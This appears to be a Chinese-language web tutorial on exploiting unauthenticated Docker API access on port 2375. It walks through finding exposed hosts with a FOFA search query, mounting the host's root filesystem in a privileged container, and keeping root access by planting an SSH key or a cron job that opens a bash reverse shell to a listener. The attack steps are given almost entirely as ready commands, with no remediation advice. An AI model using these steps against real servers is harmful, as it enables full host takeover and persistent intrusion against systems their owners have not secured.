Docker API 未授权访问漏洞问题解析
因为docker赋有远程的远程控制,docker开放了一个tcp端口2375,如果没有限制访问的话,攻击者就会通过这个端口来通过docker未授权来获取服务器权限。
docker api未授权访问漏洞
00x1 漏洞成因
因为docker赋有远程的远程控制,docker开放了一个tcp端口2375,如果没有限制访问的话,攻击者就会通过这个端口来通过docker未授权来获取服务器权限。
00x2 信息收集
FOFA中搜索port = 2375 && status_code = "404"
访问站点2375端口,显示
访问/info目录,查看版本信息
证明改站点存在docker未授权访问漏洞
00x3 漏洞利用
docker -H tcp://ip ps -a 查看容器 dokcer -H tcp:// images 查看镜像
为了获取宿主机的权限,我们需要把宿主机的根目录挂载到docker容器中
docker -H tcp://ip run -it --privileged=true -v /:/mnt --entrypoint /bin/bash image-id
--privileged=true:使用该参数,container内的root拥有真正的root权限。
-v /:/mnt:将宿主机的根目录挂载到/mnt目录下
--entrypoint /bin/bash:指定镜像的默认入口命令,该入口命令会在启动容器时作为根命令执行,所有其他传入值作为该命令的参数,用法ENTRYPOINT command param1 param2
现在就拿到了root权限,利用方式有很多种
ssh连接
ssh-keygen -t rsa //生成一个ssh公钥 cat /root/.ssh/id_rsa.pub //查看生成的公钥 echo "公钥内容" > /mnt/root/.ssh/authorized_keys //写公钥 ssh root@目标ip -i id_rsa //ssh进行连接
写计划任务
nc -lvvp port //开启监听 echo "* * * * * /bin/bash -i >& /dev/tcp/ip/port 0>&1" > /mnt/var/spool/cron/root ///反弹shell
到此这篇关于Docker API 未授权访问漏洞的文章就介绍到这了,更多相关Docker API 未授权漏洞内容请搜索脚本之家以前的文章或继续浏览下面的相关文章希望大家以后多多支持脚本之家!
相关文章
Docker中容器数据卷(Data Volume)和数据管理详解
本文主要给大家介绍了关于Docker中容器数据卷(Data Volume)和数据管理的相关资料,文中介绍的很详细,对大家具有一定的参考价值,需要的朋友们下面来一起看看吧。2017-02-02私有云存储Minio Docker镜像无法启动,提示:Adding local Minio
使用Minio在本地搭建私有云存储时出现无法启动,查看日志频繁输出“Adding local Minio host to 'mc' configuration...”,然后停止了,本文给大家分享私有云存储Minio Docker镜像无法启动,提示:Adding local Minio host to 'mc' configuration,感兴趣的朋友一起看看吧2023-11-11Docker出现Cannot connect to the Docker daemon. Is the docker d
这篇文章主要介绍了Docker出现Cannot connect to the Docker daemon. Is the docker daemon running on this host错误解决办法的相关资料,需要的朋友可以参考下2016-12-12使用phpstorm对docker中的脚本进行debug的方法
这篇文章主要介绍了使用phpstorm对docker中的脚本进行debug的方法,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧2018-08-08
最新评论